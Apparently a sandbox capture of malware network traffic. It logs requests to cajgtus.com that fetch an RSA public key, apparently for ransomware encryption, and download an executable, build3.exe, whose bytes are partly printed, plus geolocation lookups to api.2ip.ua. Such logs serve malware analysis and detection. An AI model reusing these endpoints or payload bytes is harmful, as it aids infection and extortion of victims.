Apr 24, 2024 14:47:06.667407990 CEST	1289	IN	Data Raw: 15 34 00 41 00 53 8d 85 b4 fb ff ff 50 53 ff 15 90 00 41 00 8d 45 c8 50 53 8d 45 b4 50 53 ff 15 88 00 41 00 53 53 53 53 53 53 53 ff 15 44 00 41 00 8b 45 f8 8b 0d f0 24 a0 01 2b f8 83 f9 0c 75 07 53 ff 15 80 00 41 00 8b c7 c1 e0 04 89 45 f4 8b 45 Data Ascii: 4ASPSAEPSEPSASSSSSSSDAE$+uSAEEEMUEEEEM3U3UME)ENt]MuE~_^[]V5$W=tNu_^UQeEE]UQQh^A
Apr 24, 2024 14:47:06.667447090 CEST	1289	IN	Data Raw: 44 53 f7 65 ec 8b 45 ec 81 6d fc f0 06 bd 57 81 6d cc f5 90 30 07 81 6d dc 7b e3 2f 6b 33 ff 81 3d f0 24 a0 01 00 04 00 00 75 57 57 57 57 ff 15 94 00 41 00 57 57 57 57 ff 15 60 00 41 00 57 ff 15 4c 00 41 00 57 57 57 57 ff 15 70 00 41 00 57 57 57 Data Ascii: DSeEmWm0m{/k3=$uWWWWAWWWW`AWLAWWWWpAWWWWAWW"WW"WWA8q Fr\|WtA{+F\|\|AW<AW8AX~}5EzuFT\|tA$h
Apr 24, 2024 14:47:06.667464972 CEST	1289	IN	Data Raw: 45 fc 02 50 e8 54 fd ff ff 8b c8 e8 98 00 00 00 89 45 e8 b8 37 1f 40 00 c3 83 4d fc ff 8b 7d e4 8b 75 e0 8b 5d e8 83 7d 0c 00 76 14 ff 75 0c 8b cf e8 07 ff ff ff 50 53 e8 aa f1 ff ff 83 c4 0c 6a 00 6a 01 8b cf e8 a3 fc ff ff 8d 45 e8 8b cf 50 57 Data Ascii: EPTE7@M}u]}vuPSjjEPWEPluwM_^d[]Mjj`jjH"UuY]U]UM.]UVM/UP'^]3
Apr 24, 2024 14:47:06.667480946 CEST	1289	IN	Data Raw: 6f 0e 83 e9 10 8d 76 10 66 0f 7f 0f 8d 7f 10 eb e8 0f ba e1 02 73 0d 8b 06 83 e9 04 8d 76 04 89 07 8d 7f 04 0f ba e1 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 8b 04 8d 98 25 40 00 ff e0 f7 c7 03 00 00 00 75 15 c1 e9 02 83 e2 03 Data Ascii: ovfsvs~vf%@ur*$%@r$$@$%@$,%@$@$@%@#FGFGr$%@I#FGr$%@#
Apr 24, 2024 14:47:06.871164083 CEST	1289	IN	Data Raw: ec 2c a1 a4 87 41 00 33 c5 89 45 fc 8b 45 08 8d 4d d4 53 56 8b 75 0c 57 ff 75 10 89 45 ec 8b 45 14 89 45 e4 e8 4b ff ff ff 8d 45 d4 33 ff 50 57 57 57 57 56 8d 45 e8 50 8d 45 f0 50 e8 f3 29 00 00 8b d8 83 c4 20 8b 45 e4 85 c0 74 05 8b 4d e8 89 08 Data Ascii: ,A3EEMSVuWuEEEKE3PWWWWVEPEP) EtMuEPd$YYutujutj_}tMapM_^3["]U(A3ESVuMWu}E3PSSSSVEPEPX)EEWPg(E
Apr 24, 2024 14:47:06.871191025 CEST	1289	IN	Data Raw: 2e 40 00 23 d1 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 c1 e9 02 88 47 02 83 c6 03 83 c7 03 83 f9 08 72 cc f3 a5 ff 24 95 18 2f 40 00 8d 49 00 23 d1 8a 06 88 07 8a 46 01 c1 e9 02 88 47 01 83 c6 02 83 c7 02 83 f9 08 72 a6 f3 a5 ff 24 95 18 2f 40 00 Data Ascii: .@#FGFGr$/@I#FGr$/@#r$/@I/@.@.@.@.@.@.@.@DDDDDDDDDDDDDD$/@(/@0/@</@P/@D$
Apr 24, 2024 14:47:06.871208906 CEST	1289	IN	Data Raw: 85 47 3c 00 00 ba 12 00 00 00 8d 0d 00 80 41 00 e8 40 3d 00 00 5a c3 55 8b ec 83 7d 08 00 74 2d ff 75 08 6a 00 ff 35 b4 b5 43 00 ff 15 b0 00 41 00 85 c0 75 18 56 e8 a7 36 00 00 8b f0 ff 15 ac 00 41 00 50 e8 ac 36 00 00 59 89 06 5e 5d c3 cc cc cc Data Ascii: G<A@=ZU}t-uj5CAuV6AP6Y^]L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+W\|$
Apr 24, 2024 14:47:06.871558905 CEST	1289	IN	Data Raw: 5e 01 00 00 8d 8d fc ef ff ff 85 ff 74 33 8b d1 03 d0 4f 3b ca 73 2a 8a 01 3c 0d 75 13 8d 42 ff 3b c8 73 18 8d 41 01 80 38 0a 75 10 8b c8 eb 0c 0f b6 c0 0f be 80 f0 8c 41 00 03 c8 41 85 ff 75 d1 8d 85 fc ef ff ff 2b f0 8d 04 31 e9 72 01 00 00 8b Data Ascii: ^t3O;s*<uB;sA8uAAu+1rCDt:uGB;ru .u619Xu+ppjC[D
Apr 24, 2024 14:47:06.871606112 CEST	1289	IN	Data Raw: 08 e8 c1 ff ff ff 59 ff 75 08 ff 15 c0 00 41 00 cc 55 8b ec e8 bc 53 00 00 ff 75 08 e8 11 54 00 00 59 68 ff 00 00 00 e8 a3 00 00 00 cc 6a 01 6a 01 6a 00 e8 4d 01 00 00 83 c4 0c c3 6a 01 6a 00 6a 00 e8 3e 01 00 00 83 c4 0c c3 55 8b ec 83 3d b0 10 Data Ascii: YuAUSuTYhjjjMjjj>U=AthAUYtuAYVhAhAYYuCh@k$AhAv=5YYth5UYtjjj53]Ujju]VjAVW

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 14:47:06.116128922 CEST	139	OUT	GET /test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: cajgtus.com
Apr 24, 2024 14:47:07.018940926 CEST	764	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 12:47:25 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 560 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 34 34 33 69 75 52 34 74 59 5a 62 4b 61 72 78 4c 67 32 55 5c 2f 5c 5c 6e 79 64 6f 66 34 67 72 33 50 79 67 46 34 42 45 75 57 30 49 69 70 65 52 73 38 59 32 4e 61 6a 37 4a 49 39 57 5a 2b 54 56 6d 4f 70 6d 61 64 50 62 63 52 2b 33 62 5c 2f 2b 4c 39 61 65 68 6d 2b 6b 78 6d 5c 5c 6e 76 4d 58 57 36 52 6d 68 6f 76 62 6c 32 4d 32 4a 48 71 6b 61 51 33 77 79 48 77 74 66 52 2b 5a 6e 47 4b 65 78 4d 5c 2f 76 55 2b 33 66 35 4a 67 64 76 64 61 59 45 69 6a 6f 5c 2f 34 70 41 4e 6b 4b 42 38 5c 5c 6e 52 32 53 42 33 63 37 32 74 5a 32 30 6d 6d 33 39 43 56 4c 4d 79 61 6e 38 6e 65 54 33 2b 33 67 72 64 71 58 39 7a 67 67 41 62 59 42 48 43 48 35 33 6a 51 4d 39 42 36 33 62 2b 44 37 37 72 73 77 48 5c 5c 6e 53 63 5c 2f 4c 45 6d 71 52 58 6f 6d 6a 77 37 4b 58 59 52 30 4a 52 46 35 44 66 6c 58 6d 6d 31 4a 42 61 4b 78 76 31 64 47 52 54 6f 38 77 74 49 30 79 35 54 74 7a 62 4a 66 7a 50 69 6e 6b 37 4c 33 39 5c 5c 6e 45 75 4b 42 70 41 52 4c 67 33 67 5a 65 57 39 36 64 54 35 73 41 37 43 38 69 76 4d 78 72 48 31 56 42 57 41 36 4d 67 69 45 43 4d 73 31 6d 42 48 58 70 5c 2f 6c 4e 64 4a 68 4b 75 38 58 58 33 58 46 77 5c 5c 6e 42 51 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 38 4a 48 32 37 57 64 72 57 36 6b 75 46 6b 53 36 55 77 47 39 59 75 36 4b 52 30 44 56 69 76 35 4a 79 56 6d 4b 4f 6f 4b 45 22 7d Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA443iuR4tYZbKarxLg2U\/\\nydof4gr3PygF4BEuW0IipeRs8Y2Naj7JI9WZ+TVmOpmadPbcR+3b\/+L9aehm+kxm\\nvMXW6Rmhovbl2M2JHqkaQ3wyHwtfR+ZnGKexM\/vU+3f5JgdvdaYEijo\/4pANkKB8\\nR2SB3c72tZ20mm39CVLMyan8neT3+3grdqX9zggAbYBHCH53jQM9B63b+D77rswH\\nSc\/LEmqRXomjw7KXYR0JRF5DflXmm1JBaKxv1dGRTo8wtI0y5TtzbJfzPink7L39\\nEuKBpARLg3gZeW96dT5sA7C8ivMxrH1VBWA6MgiECMs1mBHXp\/lNdJhKu8XX3XFw\\nBQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE"}

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 14:47:06.124116898 CEST	128	OUT	GET /test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: cajgtus.com
Apr 24, 2024 14:47:07.014792919 CEST	764	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 12:47:25 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 560 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 34 34 33 69 75 52 34 74 59 5a 62 4b 61 72 78 4c 67 32 55 5c 2f 5c 5c 6e 79 64 6f 66 34 67 72 33 50 79 67 46 34 42 45 75 57 30 49 69 70 65 52 73 38 59 32 4e 61 6a 37 4a 49 39 57 5a 2b 54 56 6d 4f 70 6d 61 64 50 62 63 52 2b 33 62 5c 2f 2b 4c 39 61 65 68 6d 2b 6b 78 6d 5c 5c 6e 76 4d 58 57 36 52 6d 68 6f 76 62 6c 32 4d 32 4a 48 71 6b 61 51 33 77 79 48 77 74 66 52 2b 5a 6e 47 4b 65 78 4d 5c 2f 76 55 2b 33 66 35 4a 67 64 76 64 61 59 45 69 6a 6f 5c 2f 34 70 41 4e 6b 4b 42 38 5c 5c 6e 52 32 53 42 33 63 37 32 74 5a 32 30 6d 6d 33 39 43 56 4c 4d 79 61 6e 38 6e 65 54 33 2b 33 67 72 64 71 58 39 7a 67 67 41 62 59 42 48 43 48 35 33 6a 51 4d 39 42 36 33 62 2b 44 37 37 72 73 77 48 5c 5c 6e 53 63 5c 2f 4c 45 6d 71 52 58 6f 6d 6a 77 37 4b 58 59 52 30 4a 52 46 35 44 66 6c 58 6d 6d 31 4a 42 61 4b 78 76 31 64 47 52 54 6f 38 77 74 49 30 79 35 54 74 7a 62 4a 66 7a 50 69 6e 6b 37 4c 33 39 5c 5c 6e 45 75 4b 42 70 41 52 4c 67 33 67 5a 65 57 39 36 64 54 35 73 41 37 43 38 69 76 4d 78 72 48 31 56 42 57 41 36 4d 67 69 45 43 4d 73 31 6d 42 48 58 70 5c 2f 6c 4e 64 4a 68 4b 75 38 58 58 33 58 46 77 5c 5c 6e 42 51 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 38 4a 48 32 37 57 64 72 57 36 6b 75 46 6b 53 36 55 77 47 39 59 75 36 4b 52 30 44 56 69 76 35 4a 79 56 6d 4b 4f 6f 4b 45 22 7d Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA443iuR4tYZbKarxLg2U\/\\nydof4gr3PygF4BEuW0IipeRs8Y2Naj7JI9WZ+TVmOpmadPbcR+3b\/+L9aehm+kxm\\nvMXW6Rmhovbl2M2JHqkaQ3wyHwtfR+ZnGKexM\/vU+3f5JgdvdaYEijo\/4pANkKB8\\nR2SB3c72tZ20mm39CVLMyan8neT3+3grdqX9zggAbYBHCH53jQM9B63b+D77rswH\\nSc\/LEmqRXomjw7KXYR0JRF5DflXmm1JBaKxv1dGRTo8wtI0y5TtzbJfzPink7L39\\nEuKBpARLg3gZeW96dT5sA7C8ivMxrH1VBWA6MgiECMs1mBHXp\/lNdJhKu8XX3XFw\\nBQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE"}

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 14:47:08.267374039 CEST	96	OUT	GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: cajgtus.com
Apr 24, 2024 14:47:08.976443052 CEST	1289	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 12:47:27 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT ETag: "4ae00-6074de5a4a562" Accept-Ranges: bytes Content-Length: 306688 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6krh8rh8rh88sh8l8nh8l8h8U_8{h8ri8h8l82h8l8sh8l8sh8Richrh8PELaj; @>lhd>/0@.textrhj `.data:n@.kic>\|@.rsrc/>0~@@
Apr 24, 2024 14:47:08.976475000 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 73 03 00 00 00 00 00 8c 73 03 00 9c 73 03 00 00 00 00 00 f6 6b 03 00 0c 6c 03 00 22 6c 03 00 2e 6c 03 00 48 6c 03 00 5a 6c 03 00 70 6c 03 00 86 6c 03 00 96 6c 03 00 ac 6c 03 00 c0 6c 03 00 d0 6c 03 00 ec Data Ascii: ssskl"l.lHlZlpllllllllm m4mBm^mtmmmmmmmnn&n@n\nlnnnnnnnnnoo,o@oTo`opoookooo
Apr 24, 2024 14:47:08.976605892 CEST	1289	IN	Data Raw: 53 00 6f 00 6c 00 6f 00 66 00 75 00 64 00 69 00 20 00 67 00 6f 00 78 00 6f 00 72 00 75 00 76 00 20 00 73 00 61 00 70 00 6f 00 63 00 75 00 7a 00 69 00 00 00 4e 00 69 00 6d 00 69 00 67 00 6f 00 74 00 20 00 67 00 69 00 66 00 6f 00 76 00 75 00 00 00 Data Ascii: Solofudi goxoruv sapocuziNimigot gifovuwelxolatxojiliFapejepuzeh wororuv mezumitelaMawoyujewoyosigubufozo wami xuxolesenawemo dohamefejexe
Apr 24, 2024 14:47:08.976648092 CEST	1289	IN	Data Raw: 00 2c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 68 00 61 00 72 00 3e 00 20 00 3e 00 20 00 3e 00 20 00 3e 00 3a 00 3a 00 6f 00 70 00 65 00 72 00 61 00 74 Data Ascii: ,class std::allocator<char> > > >::operator +=("this->_Has_container()", 0)C:\Program Files (x86)\Microsoft Visual Stud
Apr 24, 2024 14:47:08.976677895 CEST	1289	IN	Data Raw: 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 62 00 61 00 73 00 69 00 63 00 5f 00 73 00 74 00 72 00 69 00 6e 00 67 00 3c 00 63 00 68 00 61 00 72 00 2c 00 73 00 74 00 72 00 75 00 63 00 74 00 Data Ascii: cator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Vector_const_iterator
Apr 24, 2024 14:47:08.976744890 CEST	1289	IN	Data Raw: 00 00 00 00 00 73 00 72 00 63 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 6d 00 65 00 6d 00 63 00 70 00 79 00 5f 00 73 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 Data Ascii: src != NULLmemcpy_sf:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.cdst != NULLmemmove_sf:\dd\vctools\crt_bld\sel
Apr 24, 2024 14:47:08.976779938 CEST	1289	IN	Data Raw: 20 00 43 00 2b 00 2b 00 20 00 64 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 61 00 74 00 69 00 6f 00 6e 00 20 00 6f 00 6e 00 20 00 61 00 73 00 73 00 65 00 72 00 74 00 73 00 2e 00 00 00 00 00 6d 00 65 00 6d 00 63 00 70 00 79 00 5f 00 73 00 28 00 Data Ascii: C++ documentation on asserts.memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot
Apr 24, 2024 14:47:08.976850033 CEST	1289	IN	Data Raw: 00 55 00 4c 00 4c 00 29 00 00 00 70 00 75 00 74 00 63 00 00 00 00 00 76 00 73 00 63 00 61 00 6e 00 66 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c Data Ascii: ULL)putcvscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)f:\dd\vctools\crt_bld\self_x86\crt\src\_file.cf:\dd\vctools\crt_bld\se
Apr 24, 2024 14:47:08.976926088 CEST	1289	IN	Data Raw: 72 65 61 6c 6c 6f 63 28 29 00 00 00 00 00 45 72 72 6f 72 3a 20 6d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 69 6f 6e 3a 20 62 61 64 20 6d 65 6d 6f 72 79 20 62 6c 6f 63 6b 20 74 79 70 65 2e 0a 0a 4d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 65 64 20 61 Data Ascii: realloc()Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).Client hook re-allocation failure.Client hook re-allocation failure at file %hs
Apr 24, 2024 14:47:08.976941109 CEST	1289	IN	Data Raw: 20 66 72 65 65 20 66 61 69 6c 75 72 65 2e 0a 00 00 00 00 00 00 54 68 65 20 42 6c 6f 63 6b 20 61 74 20 30 78 25 70 20 77 61 73 20 61 6c 6c 6f 63 61 74 65 64 20 62 79 20 61 6c 69 67 6e 65 64 20 72 6f 75 74 69 6e 65 73 2c 20 75 73 65 20 5f 61 6c 69 Data Ascii: free failure.The Block at 0x%p was allocated by aligned routines, use _aligned_free()_msize_dbg%hs located at 0x%p is %Iu bytes long.%hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).HEAP C
Apr 24, 2024 14:47:09.259876966 CEST	1289	IN	Data Raw: 61 00 74 00 65 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 4f 62 6a 65 63 74 20 64 75 6d 70 20 63 6f 6d 70 6c 65 74 65 2e 0a 00 00 63 72 74 20 62 6c 6f 63 6b 20 61 74 20 30 78 25 70 2c 20 73 75 62 74 79 70 65 20 25 78 2c 20 25 49 75 Data Ascii: ate != NULLObject dump complete.crt block at 0x%p, subtype %x, %Iu bytes long.normal block at 0x%p, %Iu bytes long.client block at 0x%p, subtype %x, %Iu bytes long.{%ld} %hs(%d) : #File Error#(%d) : Dumping objects

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:47:00 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-24 12:47:01 UTC	910	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 24 Apr 2024 12:47:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QQJU7bVJMyFfnGZ4O99RgYPq1qFKGsQ7WLn%2FjB8VC9Evzto49ghn6USdRTlFCo83WAsN17z4iyS4NfdMJkZxVICm%2BIBfRkXnZo2bywRuSHE3NM6HCrqaGq5cTWBS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8796330d4bf82ad3-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 12:47:01 UTC	459	IN	Data Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 35 62 33 33 33 65 33 37 32 62 31 62 36 39 33 32 32 62 37 35 33 36 33 65 36 34 32 38 32 65 33 39 33 31 33 65 33 38 Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#5b333e372b1b69322b75363e64282e39313e38
2024-04-24 12:47:01 UTC	471	IN	Data Raw: d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 32 38 34 30 34 64 34 34 35 38 36 38 31 61 34 31 35 38 30 36 35 64 34 39 31 37 35 62 35 64 34 61 34 32 34 64 34 62 35 63 31 35 31 61 34 31 35 38 30 36 35 64 34 39 22 3e 3c 73 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#28404d4458681a4158065d49175b5d4a424d4b5c151a4158065d49"><s
2024-04-24 12:47:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-04-24 12:47:02 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-24 12:47:03 UTC	910	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 24 Apr 2024 12:47:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: 